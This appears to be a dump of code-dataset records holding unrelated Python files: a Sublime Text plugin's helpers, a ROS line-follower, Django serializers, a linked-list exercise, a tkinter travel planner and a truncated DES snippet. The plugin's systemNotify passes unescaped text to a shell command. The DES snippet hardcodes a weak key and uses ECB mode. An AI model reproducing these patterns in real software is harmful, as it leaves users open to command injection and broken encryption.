100))\n image4 = pygame.image.load(\"trumpet.jpg\")\n win.blit(image4, (200, 500))\n image5 = pygame.image.load(\"clap.png\")\n win.blit(image5, (500, 500))\n image6 = pygame.image.load(\"piano.jpg\")\n win.blit(image6, (800, 500))\n\ndef progloop(run):\n while(run == True):\n loadimages()\n cursor = pygame.mouse.get_pos()\n press = pygame.mouse.get_pressed()\n pygame.display.update()\n \n if(200\n# @param folders: list of paths to folders to search in\n#\n# @return config filepath\ndef guessConfigFile(folders):\n for folder in folders:\n config = getConfigFile(folder)\n if config is not None:\n return config\n\n for folder in os.walk(folder):\n config = getConfigFile(folder[0])\n if config is not None:\n return config\n\n return None\n# Returns configuration file for a given file\n#\n# @type file_path: string\n# @param file_path: file_path to the file for which we try to find a config\n#\n# @return file path to the config file or None\n#\n# @global configs\ndef getConfigFile(file_path):\n cacheKey = file_path\n if isString(cacheKey) is False:\n cacheKey = cacheKey.decode('utf-8')\n\n # try cached\n try:\n if configs[cacheKey] and os.path.exists(configs[cacheKey]) and os.path.getsize(configs[cacheKey]) > 0:\n # printMessage(\"Loading config: cache hit (key: \" + cacheKey + \")\")\n \n return configs[cacheKey]\n else:\n raise KeyError\n\n # cache miss\n except KeyError:\n try:\n folders = getFolders(file_path)\n\n if folders is None or len(folders) == 0:\n return None\n\n configFolder = findConfigFile(folders)\n\n if configFolder is None:\n # printMessage(\"Found no config for {\" + cacheKey + \"}\", None, True)\n return None\n\n config = os.path.join(configFolder, configName)\n configs[cacheKey] = config\n\n return config\n\n except AttributeError:\n return None\n# Finds a config file in given folders\n#\n# @type folders: list\n# @param folders: list of paths to folders to filter\n#\n# @return list of file paths\n#\n# @global configName\ndef findConfigFile(folders):\n return findFile(folders, configName)\ndef getProjectRoot():\n if hasActiveView() is False:\n file_path = os.path.dirname(guessConfigFile(sublime.active_window().folders()))\n \n else :\n file_path = os.path.dirname(sublime.active_window().active_view().file_name())\n temp = getConfigFile(file_path)\n if temp is None:\n return temp\n return os.path.dirname(getConfigFile(file_path))\n \n\n# Returns path of file from its config file\n#\n# @type file_path: string\n# @param file_path: file path to the file of which we want the hash\n#\n# @return string file path from settings root\ndef getRootPath(file_path, prefix = ''):\n return prefix + os.path.relpath(file_path, os.path.dirname(getConfigFile(file_path))).replace('\\\\', '/')\n\n\n# Returns a file path associated with view\n#\n# @type file_path: string\n# @param file_path: file path to the file of which we want the hash\n#\n# @return string file path\ndef getFileName(view):\n return view.file_name()\n\ndef verifyConfig(config):\n if type(config) is not dict:\n return \"Config is not a {dict} type\"\n keys = ['action','action_on_save']\n for key in keys:\n if key not in config:\n return \"Config is missing a {\" + key + \"} key\"\n if config['action'] is not None and isString(config['action']) is False:\n return \"Config entry 'action' must be null or string, \" + str(type(config['action'])) + \" given\"\n # if config['version'] is not None and isString(config['version']) is False:\n # return \"Config entry 'version' must be null or string, \" + str(type(config['version'])) + \" given\"\n return True\n# Finds a real file path among given folder paths\n# and returns the path or None\n#\n# @type folders: list\n# @param folders: list of paths to folders to look into\n# @type file_name: string\n# @param file_name: file name to search\n#\n# @return string file path or None\ndef findFile(folders, file_name):\n if folders is None:\n return None\n\n for folder in folders:\n if isString(folder) is False:\n folder = folder.decode('utf-8')\n\n if os.path.exists(os.path.join(folder, file_name)) is True:\n return folder\n\n return None\ndef isString(var):\n var_type = type(var)\n\n if sys.version[0] == '3':\n return var_type is str or var_type is bytes\n else:\n return var_type is str or var_type is unicode\n# Get all folders paths from given path upwards\n#\n# @type file_path: string\n# @param file_path: absolute file path to return the paths from\n#\n# @return list of file paths\n#\n# @global nestingLimit\ndef getFolders(file_path):\n if file_path is None:\n return []\n\n folders = [file_path]\n limit = nestingLimit\n\n while True:\n split = os.path.split(file_path)\n\n # nothing found\n if len(split) == 0:\n break\n\n # get filepath\n file_path = split[0]\n limit -= 1\n\n # nothing else remains\n if len(split[1]) == 0 or limit < 0:\n break\n\n folders.append(split[0])\n\n return folders\n# Prints a special message to console and optionally to status bar\n#\n# @type text: string\n# @param text: message to status bar\n# @type name: string|None\n# @param name: comma-separated list of connections or other auxiliary info\n# @type onlyVerbose: boolean\n# @param onlyVerbose: print only if config has debug_verbose enabled\n# @type status: boolean\n# @param status: show in status bar as well = true\n#\n# @global isDebug\n# @global isDebugVerbose\ndef printMessage(text, name=None, onlyVerbose=False, status=False):\n message = \"Formax_Sublime\"\n\n if name is not None:\n message += \" [\" + name + \"]\"\n\n message += \" > \"\n message += text\n\n if isDebug and (onlyVerbose is False or isDebugVerbose is True):\n # print (message.encode('utf-8'))\n print (message)\n\n if status:\n dumpMessage(message)\n# Issues a system notification for certian event\n#\n# @type text: string\n# @param text: notification message\ndef systemNotify(text):\n try:\n import subprocess\n\n text = \"Formax_Sublime > \" + text\n\n if sys.platform == \"darwin\":\n \"\"\" Run Grown Notification \"\"\"\n cmd = '/usr/local/bin/growlnotify -a \"Sublime Text 3\" -t \"FTPSync message\" -m \"'+text+'\"'\n subprocess.call(cmd,shell=True)\n elif sys.platform == \"linux2\":\n subprocess.call('/usr/bin/notify-send \"Sublime Text 3\" \"'+text+'\"',shell=True)\n elif sys.platform == \"win32\":\n \"\"\" Find the notifaction platform for windows if there is one\"\"\"\n\n except Exception as e:\n printMessage(\"Notification failed\")\n handleExceptions(e)\n# Schedules a single message to be logged/shown\n#\n# @type text: string\n# @param text: message to status bar\n#\n# @global messageTimeout\ndef dumpMessage(text):\n sublime.set_timeout(lambda: statusMessage(text), messageTimeout)\n\n# Parses given config and adds default values to each connection entry\n#\n# @type file_path: string\n# @param file_path: file path to the file of which we want the hash\n#\n# @return config dict or None\n#\n# @global isLoaded\n# @global coreConfig\n# @global projectDefaults\ndef loadConfig(file_path):\n\n if isLoaded is False:\n printMessage(\"FTPSync is not loaded (just installed?), please restart Sublime Text\")\n return None\n\n if isString(file_path) is False:\n printMessage(\"LoadConfig expects string, \" + str(type(file_path)) + \" given\")\n return None\n\n if os.path.exists(file_path) is False:\n return None\n\n # parse config\n try:\n config = parseJson(file_path)\n except Exception as e:\n printMessage(\"Failed parsing configuration file: {\" + file_path + \"} (commas problem?) [Exception: \" + stringifyException(e) + \"]\", status=True)\n handleException(e)\n return None\n\n result = {}\n\n # merge with defaults and check\n for name in config:\n if type(config[name]) is not dict:\n printMessage(\"Failed using configuration: contents are not dictionaries but values\", status=True)\n return None\n\n result[name] = dict(list(projectDefaults.items()) + list(config[name].items()))\n result[name]['file_path'] = file_path\n\n # fix path\n if len(result[name]['path']) > 1 and result[name]['path'][-1] != \"/\":\n result[name]['path'] = result[name]['path'] + \"/\"\n\n # merge nested\n for index in nested:\n list1 = list(list(projectDefaults.items())[index][1].items())\n list2 = list(result[name][list(projectDefaults.items())[index][0]].items())\n\n result[name][list(projectDefaults.items())[index][0]] = dict(list1 + list2)\n try:\n if result[name]['debug_extras']['dump_config_load'] is True:\n print(result[name])\n except KeyError:\n pass\n\n # add passwords\n if file_path in passwords and name in passwords[file_path] and passwords[file_path][name] is not None:\n result[name]['password'] = passwords[file_path][name]\n\n result[name] = updateConfig(result[name])\n\n verification_result = verifyConfig(result[name])\n\n if verification_result is not True:\n printMessage(\"Invalid configuration loaded: <\" + str(verification_result) + \">\", status=True)\n\n # merge with generics\n final = dict(list(coreConfig.items()) + list({\"connections\": result}.items()))\n\n # override by overridingConfig\n if file_path in overridingConfig:\n for name in overridingConfig[file_path]['connections']:\n if name in final['connections']:\n for item in overridingConfig[file_path]['connections'][name]:\n final['connections'][name][item] = overridingConfig[file_path]['connections'][name][item]\n\n return final\n# Parses JSON-type file with comments stripped out (not part of a proper JSON, see http://json.org/)\n#\n# @type file_path: string\n#\n# @return dict|None\n#\n# @global removeLineComment\ndef parseJson(file_path):\n attempts = 3\n succeeded = False\n\n while attempts > 0:\n attempts = attempts - 1\n try:\n json = parseJsonInternal(file_path)\n if debugJson:\n printMessage(\"Type returned: \" + str(type(json)))\n printMessage(\"Is empty: \" + str(bool(json)))\n\n succeeded = type(json) is dict and bool(json) is True\n break\n except Exception as e:\n handleException(e)\n printMessage(\"Retrying reading config... (remaining \" + str(attempts) + \")\")\n sleep(0.1)\n\n if succeeded:\n return json\n else:\n printMessage(\"Failed to read settings from file: \" + str(file_path))\n return {}\n\n# Parses JSON-type file with comments stripped out (not part of a proper JSON, see http://json.org/)\n#\n# @type file_path: string\n#\n# @return dict\n#\n# @global removeLineComment\ndef parseJsonInternal(file_path):\n if isString(file_path) is False:\n raise Exception(\"Expected filepath as string, \" + str(type(file_path)) + \" given\")\n\n if os.path.exists(file_path) is False:\n raise IOError(\"File \" + str(file_path) + \" does not exist\")\n\n if os.path.getsize(file_path) == 0:\n raise IOError(\"File \" + str(file_path) + \" is empty\")\n\n contents = \"\"\n\n try:\n file = open(file_path, 'r')\n\n for line in file:\n contents += removeLineComment.sub('', line).strip()\n finally:\n file.close()\n\n decoder = json.JSONDecoder()\n\n if debugJson:\n printMessage(\"Debug JSON:\")\n print (\"=\"*86)\n print (contents)\n print (\"=\"*86)\n\n if len(contents) > 0:\n return decoder.decode(contents)\n else:\n raise IOError('Content read from ' + str(file_path) + ' is empty')\n# Safer print of exception message\ndef stringifyException(exception):\n return str(exception)\n# Dumps the exception to console\ndef handleException(exception):\n print (\"Formax_Sublime > Exception in user code:\")\n print ('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print ('-' * 60)\n\ndef statusMessage(text):\n sublime.status_message(text)\n","sub_path":"formax_psync.py","file_name":"formax_psync.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"526062489","text":"#!/usr/bin/env python\nimport rospy\nimport cv2\nimport numpy as np\nimport math\nfrom os import path\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import Image\nfrom ackermann_msgs.msg import AckermannDriveStamped, AckermannDrive\nfrom move_robot import MoveRosBots\nfrom geometry_msgs.msg import Twist\n\ndef callback(x):\n pass\n\nclass LineFollower(object):\n\n def __init__(self):\n \n self.bridge_object = CvBridge()\n self.datapath = \"/home/michaelji/tritonai/catkin_ws/src/ocvfiltercar/data/records_1/\"\n\n #self.image_sub = rospy.Subscriber(\"/robot1/camera1/image_raw\",Image,self.camera_callback)\n self.image_sub = rospy.Subscriber(\"/image\", Image, self.camera_callback)\n self.drive_pub = rospy.Publisher('/drive', AckermannDriveStamped, queue_size=10)\n\n self.moverosbots_object = MoveRosBots()\n\n def camera_callback(self,data):\n\n # HSV filter for isolating all lines\n bestfilter = {\n \"lowH\": 16,\n \"highH\": 43,\n \"lowS\": 51,\n \"highS\": 140,\n \"lowV\": 42,\n \"highV\": 213\n }\n # RGB for mask to isolate yellow center line\n rgbcenterfilter = {\n \"lowR\": 200,\n \"highR\": 255,\n \"lowG\": 100,\n \"highG\": 255,\n \"lowB\": 100,\n \"highB\": 170\n }\n # RGB for mask to isolate white borders\n rgbsidefilter = {\n \"lowR\": 200,\n \"highR\": 255,\n \"lowG\": 200,\n \"highG\": 255,\n \"lowB\": 200,\n \"highB\": 255\n }\n\n # Load filter values\n lowR = rgbcenterfilter.get(\"lowR\")\n highR = rgbcenterfilter.get(\"highR\")\n lowG = rgbcenterfilter.get(\"lowG\")\n highG = rgbcenterfilter.get(\"highG\")\n lowB = rgbcenterfilter.get(\"lowB\")\n highB = rgbcenterfilter.get(\"highB\")\n\n # Filter experimentation\n \"\"\"\n cv2.namedWindow('sliders')\n\n cv2.createTrackbar('lowR', 'sliders', lowR, 255, callback)\n cv2.createTrackbar('highR', 'sliders', highR, 255, callback)\n\n cv2.createTrackbar('lowG', 'sliders', lowG, 255, callback)\n cv2.createTrackbar('highG', 'sliders', highG, 255, callback)\n\n cv2.createTrackbar('lowB', 'sliders', lowB, 255, callback)\n cv2.createTrackbar('highB', 'sliders', highB, 255, callback)\n \"\"\"\n\n i = 0 \n #while path.exists(self.datapath + \"img_\" + str(i) + \".jpg\"):\n while True:\n cv_image = cv2.imread(self.datapath + \"img_\" + str(i) + \".jpg\")\n #print(data)\n \"\"\"\n try:\n # We select bgr8 because its the OpneCV encoding by default\n cv_image = self.bridge_object.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n exit(1)\n \"\"\"\n height, width, channels = cv_image.shape\n crop_img = cv_image[int(height/2):height, 0:width]\n\n # Set mask values\n \"\"\"\n lowR = cv2.getTrackbarPos('lowR', 'sliders')\n highR = cv2.getTrackbarPos('highR', 'sliders')\n lowG = cv2.getTrackbarPos('lowG', 'sliders')\n highG = cv2.getTrackbarPos('highG', 'sliders')\n lowB = cv2.getTrackbarPos('lowB', 'sliders')\n highB = cv2.getTrackbarPos('highB', 'sliders')\n \"\"\"\n rgb = cv2.cvtColor(crop_img, cv2.COLOR_BGR2RGB)\n\n lower = np.array([lowR, lowG, lowB])\n higher = np.array([highR, highG, highB])\n mask = cv2.inRange(rgb, lower, higher)\n\n # Display images\n \"\"\"\n cv2.imshow('cv_image', cv_image)\n cv2.imshow('crop_img', crop_img)\n cv2.imshow('mask', mask)\n # Clean monitor positions\n cv2.moveWindow(\"mask\", 0,900);\n cv2.moveWindow(\"crop_img\", 0,400);\n cv2.moveWindow(\"cv_image\", 0,700);\n \"\"\"\n\n # Calculate c_x, c_y\n # Center Line:\n # Calculate centroid of the blob of binary image using ImageMoments\n m = cv2.moments(mask, False)\n try:\n cx, cy = m['m10']/m['m00'], m['m01']/m['m00']\n except ZeroDivisionError:\n cy, cx = height/2, width/2\n\n # Draw Circle on resultant cropped image\n \"\"\"\n result =cv2.bitwise_and(crop_img,crop_img, mask = mask)\n cv2.circle(result,(int(cx), int(cy)), 5,(0,0,255),-1)\n cv2.imshow('result', result)\n cv2.moveWindow('result', 400, 0)\n \"\"\"\n\n error_x = cx - width / 2;\n angular_z = -error_x / 100;\n\n # ROS Message publish\n a = AckermannDriveStamped()\n\n a.drive.steering_angle = angular_z\n a.drive.speed = 2 / (1 + math.exp(abs(4 * angular_z)))\n\n rospy.loginfo(\"ANGULAR VALUE: \" + str(a.drive.steering_angle))\n rospy.loginfo(\"SPEED VALUE: \" + str(a.drive.speed))\n #twist_object.linear.x = 0.2;\n #twist_object.angular.z = -error_x / 100;\n\n # SIDES\n # Use gradients to determine steering\n # Load filter values\n \"\"\"\n lowR = rgbsidefilter.get(\"lowR\")\n highR = rgbsidefilter.get(\"highR\")\n lowG = rgbsidefilter.get(\"lowG\")\n highG = rgbsidefilter.get(\"highG\")\n lowB = rgbsidefilter.get(\"lowB\")\n highB = rgbsidefilter.get(\"highB\")\n\n border_lower = np.array([lowR, lowG, lowB])\n border_higher = np.array([highR, highG, highB])\n border_mask = cv2.inRange(rgb, border_lower, border_higher)\n grad_x = np.diff(border_mask, n = 1, axis = 0)\n all_indices = [[]]\n print(grad_x)\n for row in grad_x:\n indices = []\n for index in range(len(row)):\n if row[index] != 0:\n print(str(index) + \" \", end='')\n np.append(indices, index)\n\n if len(indices) == 2:\n np.append(all_indices, indices)\n\n print(all_indices)\n print(np.mean(np.diff(all_indices, axis = 0), axis = 0))\n\n cv2.imshow('gradx', grad_x)\n cv2.moveWindow('gradx', 400, 600)\n \"\"\"\n i += 1\n \n \n key = cv2.waitKey(50) & 0xFF\n if key == ord('q'):\n exit(0)\n\n return\n \n def clean_up(self):\n self.moverosbots_object.clean_class()\n cv2.destroyAllWindows()\n \n \n\ndef main():\n rospy.init_node('line_following_node', anonymous=True)\n \n line_follower_object = LineFollower()\n \n line_follower_object.camera_callback(3)\n\n rate = rospy.Rate(5)\n ctrl_c = False\n def shutdownhook():\n # works better than the rospy.is_shut_down()\n line_follower_object.clean_up()\n rospy.loginfo(\"shutdown time!\")\n ctrl_c = True\n \n rospy.on_shutdown(shutdownhook)\n \n while not ctrl_c:\n rate.sleep()\n \n \nif __name__ == '__main__':\n main()","sub_path":"ocvfiltercar/scripts/filter_follow_exp.py","file_name":"filter_follow_exp.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"224446138","text":"from rest_framework import serializers\n\nfrom .. import models\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.User\n fields = ('username', 'first_name', 'last_name', 'phone')\n read_only_fields = fields\n\n\nclass ServiceSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Service\n fields = (\n 'id',\n 'name',\n 'description',\n 'price',\n 'benefit_short',\n 'benefit_long',\n 'eula_url',\n 'img_logo_url',\n 'img_service_url',\n )\n read_only_fields = fields\n\n\nclass SensorAttributeSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.SensorAttribute\n fields = ('uri', 'description', 'ui_type')\n read_only_fields = fields\n\n\nclass SensorSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Sensor\n fields = ('id', 'name', 'description', 'provides')\n read_only_fields = fields\n\n\nclass BasicSensorSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Sensor\n fields = ('id', 'name', 'description')\n read_only_fields = fields\n\n\nclass ApartmentSensorValueSerializer(serializers.ModelSerializer):\n description = serializers.CharField(source='attribute.description')\n uri = serializers.CharField(source='attribute.uri')\n ui_type = serializers.CharField(source='attribute.ui_type')\n sensor = serializers.IntegerField(source='apartment_sensor.sensor_id')\n\n class Meta:\n model = models.ApartmentSensorValue\n fields = ('sensor', 'value', 'updated_at', 'description', 'uri', 'ui_type')\n\n\nclass ApartmentSensorSerializer(serializers.ModelSerializer):\n apartment_sensor_values = ApartmentSensorValueSerializer(many=True, read_only=True)\n sensor = BasicSensorSerializer()\n\n class Meta:\n model = models.ApartmentSensor\n fields = ('id', 'apartment_sensor_values', 'identifier', 'sensor')\n\n\nclass ApartmentSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = models.Apartment\n fields = ('id', 'street', 'city', 'postal_code', 'apartment_sensors')\n read_only_fields = fields\n\n\nclass SubscriptionSerializer(serializers.HyperlinkedModelSerializer):\n service = ServiceSerializer()\n\n class Meta:\n model = models.Subscription\n fields = ('id', 'created_at', 'updated_at', 'service')\n","sub_path":"backend/core/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503060215","text":"\"\"\"\nGiven a non-empty, singly linked list with head node head, return a middle node of linked list.\n\nIf there are two middle nodes, return the second middle node.\n\n \n\nExample 1:\n\nInput: [1,2,3,4,5]\nOutput: Node 3 from this list (Serialization: [3,4,5])\nThe returned node has value 3. (The judge's serialization of this node is [3,4,5]).\nNote that we returned a ListNode object ans, such that:\nans.val = 3, ans.next.val = 4, ans.next.next.val = 5, and ans.next.next.next = NULL.\nExample 2:\n\nInput: [1,2,3,4,5,6]\nOutput: Node 4 from this list (Serialization: [4,5,6])\nSince the list has two middle nodes with values 3 and 4, we return the second one.\n \n\nNote:\n\nThe number of nodes in the given list will be between 1 and 100.\n*/\n/*\nReference: \n\thttps://www.geeksforgeeks.org/write-a-c-function-to-print-the-middle-of-the-linked-list/\n\thttps://practice.geeksforgeeks.org/problems/finding-middle-element-in-a-linked-list/1\t\n\nMethod 1:\n\tTraverse the whole linked list and count the no. of nodes. Now traverse the list again till count/2 and return the node at count/2.\n\nMethod 2:\nTraverse linked list using two pointers. Move one pointer by one and other pointer by two. When the fast pointer reaches end slow pointer will reach middle of the linked list.\n\nBelow image shows how printMiddle function works in the code :\n\n\"\"\"\n\n# Python3 program to \n# your task is to complete this function\n# function should return index to the any valid peak element\ndef findMid(head):\n\tcount = 1\n\ttemp = head\n\twhile(temp.next):\n\t\ttemp = temp.next\n\t\tcount = count + 1\n\t#Traverse the list again till count/2 and return the node at count/2.\n\ttemptwo = head\n\tfor i in range(int(count/2)):\n\t\ttemptwo = temptwo.next \n\t\n\treturn temptwo\n\t\n#Driver Code Starts\n#Node Class\nclass node:\n\tdef __init__(self, val):\n\t\tself.data = val\n\t\tself.next = None \n\t\n#Linked List Class \nclass Linked_List:\n\tdef __init__(self):\n\t\tself.head = None\n\t\t\n\tdef insert(self, val):\n\t\tif self.head == None:\n\t\t\tself.head = node(val)\n\t\telse:\n\t\t\tnew_node = node(val)\n\t\t\ttemp = self.head\n\t\t\twhile(temp.next):\n\t\t\t\ttemp = temp.next\n\t\t\ttemp.next = new_node\n\t\ndef createList(arr, n):\n\tlis = Linked_List()\n\tfor i in range(n):\n\t\tlis.insert(arr[i])\n\treturn lis.head\n\nif __name__ == '__main__':\n\tt = int(input()) \n\tfor i in range(t):\n\t\tn = int(input())\n\t\tarr = list(map(int, input().strip().split()))\n\t\thead = createList(arr, n)\n\t\tprint(findMid(head).data)\n\t\t\n","sub_path":"30-day-leetcoding-challenge/Week 2/MiddleoftheLinkedList.py","file_name":"MiddleoftheLinkedList.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"430635062","text":"import QBH_dtw as dtw\nimport string\n\n# Process a signle file\nnoteList = dtw.readFile('00029.txt')\nnumberList = dtw.string2number(noteList)\nsmoothList = dtw.smooth(numberList)\ninterList = dtw.inter4list(smoothList)\n\nprint(interList)\n\n","sub_path":"src/demo/processSingleFile.py","file_name":"processSingleFile.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"330597371","text":"#Creating a window using tinker\nfrom tkinter import *\nfrom tkinter import simpledialog\nfrom tkinter import ttk\nfrom math import *\nfrom tkinter.messagebox import *\nfrom datetime import date\nfrom tkinter.font import Font\nimport tkinter as tk\nimport datetime\nimport pytz\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\nimport json\n\n\n\n\n\n\n\nroot = Tk()\nroot.geometry(\"1200x950\")\nframe = Frame(root)\nframe.pack()\n\nleftframe = Frame(root)\nleftframe.pack(side=LEFT)\n \nrightframe = Frame(root)\nrightframe.pack(side=RIGHT)\n\ntopframe = Frame(root)\ntopframe.pack(side=TOP)\n\n\n\n#create tabs\ntabControl = ttk.Notebook(root) \n\ntab1 = ttk.Frame(tabControl) \ntab2 = ttk.Frame(tabControl)\ntab3 = ttk.Frame(tabControl)\n\ntabControl.add(tab1, text ='Mainpage') \ntabControl.add(tab2, text ='Budget') \ntabControl.add(tab3, text ='Address Book') \n\ntabControl.pack(expand = 1, fill =\"both\") \n\n#datetime\n\n#Countdown to your vacation\n\ndef countdown():\n fmt1 = '%D'\n current_date=datetime.datetime.now()\n year, month, day=map(int,blank3.get().split(','))\n vacation_day=datetime.datetime(year,month,day)\n countdown_days=(vacation_day-current_date)\n countdown_days_formated=countdown_days.days\n blank4.insert(0, countdown_days_formated)\n\n\nLabel(tab1, text=\"What day is your vacation. Enter in form YYYY,MM,DD\").pack(side=TOP, pady=10)\nblank3=Entry(tab1)\nblank3.pack(side=TOP)\n\nbutton = Button(tab1, text=\"Countdown\", command=countdown)\nbutton.pack(side=TOP, padx=5)\n\nLabel(tab1, text=\"Number of Days until your vacation: \").pack(side=TOP, pady=10)\n\nblank4=Entry(tab1)\nblank4.pack(side=TOP)\n\n#Converting from your current time zone to Japanese time Zone\nLabel(tab1,text=\"Please choose your current timezone\").pack(side=LEFT, padx=5, pady=20)\n\n\nOPTIONS = [\n'US/Eastern',\n'America/Chicago',\n'America/Los_Angeles'\n] #etc\n\n\n\nvariable = StringVar(tab1)\nvariable.set(OPTIONS[0]) # default value\n\nw = OptionMenu(tab1, variable, *OPTIONS)\nw.pack(side=LEFT, padx=5)\n\nnow_utc = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)\n\ndef ok():\n fmt = '%H:%M'\n \n source_time_zone = pytz.timezone(variable.get())\n local_time = source_time_zone.normalize(now_utc.astimezone(source_time_zone))\n local_time_formatted=local_time.strftime(fmt)\n blank2.insert(0, local_time_formatted)\n\n Japan_timezone = pytz.timezone('Japan')\n Japan_local_time = Japan_timezone.normalize(now_utc.astimezone(Japan_timezone))\n \n \n Japan_local_time_formatted=Japan_local_time.strftime(fmt)\n blank1.insert(0, Japan_local_time_formatted)\n\nbutton = Button(tab1, text=\"OK\", command=ok)\nbutton.pack(side=LEFT, padx=5)\n\nLabel(tab1, text=\"Current Local Time:\").pack(side=LEFT,padx=5)\nblank2=Entry(tab1)\nblank2.pack(side=LEFT, padx=5)\n\n\nLabel(tab1, text=\"Current Time in Japan\").pack(side=LEFT, padx=5)\nblank1=Entry(tab1)\nblank1.pack(side=LEFT, padx=5)\n\n\n\n\n\n\n\n\n\n#Currency Conversion - located on tab 2\n\ndef show_answer():\n Ans = float(num1.get()) * 103.23\n blank.insert(0, Ans)\n\n\n\n\n\nButton(tab2, text='Show', command=show_answer).pack(side=BOTTOM, padx=5)\n\n\nblank = Entry(tab2)\nblank.pack(side=BOTTOM, padx=5)\n\nLabel(tab2, text = \"Amount in Yen:\").pack(side=BOTTOM, padx=5)\n\nnum1 = Entry(tab2)\nnum1.pack(side=BOTTOM, padx=5)\n\nLabel(tab2, text = \"Enter USD:\").pack(side=BOTTOM, padx=5)\n\n\n#Pie Chart\n\nLabel(tab2, text = \"What is your food budget?:\").pack(side=TOP, padx=5)\nfood_budget = Entry(tab2)\nfood_budget.pack(side=TOP, pady=5)\n\nLabel(tab2, text = \"What is your travel budget?:\").pack(side=TOP, padx=5)\ntravel_budget = Entry(tab2)\ntravel_budget.pack(side=TOP, pady=5)\n\nLabel(tab2, text = \"What is your entertainment budget?:\").pack(side=TOP, padx=5)\nentertainment_budget = Entry(tab2)\nentertainment_budget.pack(side=TOP, pady=5)\n\nLabel(tab2, text = \"What is your shopping budget?:\").pack(side=TOP, padx=5)\nshopping_budget = Entry(tab2)\nshopping_budget.pack(side=TOP, pady=5)\n\ndef piechart():\n global food_budget\n global travel_budget\n global entertainment_budget\n global shopping_budget\n\n global pie2\n\n food_budget1=float(food_budget.get())\n travel_budget1=float(travel_budget.get())\n entertainment_budget1=float(entertainment_budget.get())\n shopping_budget1=float(shopping_budget.get())\n\n figure2 = Figure(figsize=(4,3), dpi=100) \n subplot2 = figure2.add_subplot(111) \n labels2 = 'Food', 'Travel', 'Entertainment', 'Shopping'\n pieSizes = [float(food_budget1),float(travel_budget1),float(entertainment_budget1),float(shopping_budget1)]\n my_colors2 = ['lightblue','lightsteelblue','silver','red']\n explode2 = (0, 0.1, 0,0) \n subplot2.pie(pieSizes, colors=my_colors2, explode=explode2, labels=labels2, autopct='%1.1f%%', shadow=True, startangle=90) \n subplot2.axis('equal') \n pie2 = FigureCanvasTkAgg(figure2, tab2)\n pie2.get_tk_widget().pack()\n\n\n\nButton(tab2, text='Calculate', command=piechart).pack(side=TOP, pady=5)\n\n#addressbook\n\n#this section allows people to input the address and name of the place and then puts that information into a dictionary\n\naddressbook={}\ndef addressbookuserinput():\n useradded={str(nameofplace.get()):str(addressofplace.get())}\n addressbook.update(useradded)\n with open ('addressbook.json','w') as f:\n f.write(json.dumps(addressbook))\n \n \n \n\nLabel(tab3, text = \"Enter Name of Place of Interest:\").grid(row=0, column=0)\nLabel(tab3, text = \"Enter Address of Place:\").grid(row=0, column=2)\n\n\nnameofplace = Entry(tab3)\nnameofplace.grid(row=0, column=1)\n\naddressofplace = Entry(tab3)\naddressofplace.grid(row=0, column=3)\n\nButton(tab3, text='Add to address book', command=addressbookuserinput).grid(row=0, column=4, sticky=W,)\n\n\n#This is where the user can put an address into the entry and the program will spit out a address\nuserneededaddress=Entry(tab3)\nuserneededaddress.grid(row=1, column=1)\n\naddressofuserinput=Entry(tab3)\naddressofuserinput.grid(row=2, column=2)\n\nLabel(tab3, text=\"The address of the requested place is: \").grid(row=2, column=1)\nLabel(tab3, text=\"Enter Name of Place you would like an address for: \").grid(row=1, column=0)\n\ndef search_entry(): \n s=open('addressbook.json','r').read()\n if userneededaddress.get() in s:\n y=str(addressbook[userneededaddress.get()])\n addressofuserinput.insert(0, y)\n \n else:\n addressofuserinput.insert(0, \"Not in Book\")\n \n \n #this creates a new label to the GUI\n \n\nButton(tab3, text='search_entry', command=search_entry).grid(row=1, column=2)\n\n\n\n\nroot.mainloop()\n\n\n","sub_path":"plannerapp.py","file_name":"plannerapp.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"537742902","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re\r\nimport io\r\n\r\n\r\ndef get_html(file_name):\r\n with io.open(file_name, 'r', encoding='utf-8') as fp:\r\n return fp.read()\r\n\r\n\r\ndef get_url(html):\r\n pattern = r'http[s]?://[\\w.-/]+'\r\n return re.findall(pattern, html)\r\n\r\n\r\nif __name__ == '__main__':\r\n html = get_html('web.html')\r\n with io.open('results.txt', 'w', encoding='utf-8') as fp:\r\n for url in get_url(html):\r\n fp.write(url + '\\n')\r\n","sub_path":"python/0009/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"646337235","text":"from Crypto.Cipher import DES\nimport base64\nimport binascii\n\nclass Crypt():\n def __init__(self):\n self.key= b'abcdefgh'\n def encypt(self, s):\n\n # 需要去生成一个DES对象\n des = DES.new(self.key, DES.MODE_ECB)\n # 需要加密的数据\n text =s\n text = text + (8 - (len(text) % 8)) * '='\n # 加密的过程\n encrypto_text = des.encrypt(text.encode())\n encrypto_text = binascii.b2a_hex(encrypto_text)\n return encrypto_text\n\n def descypt(self, s):\n # 解密\n cipherX = DES.new(self.key, DES.MODE_CBC)\n bytedt 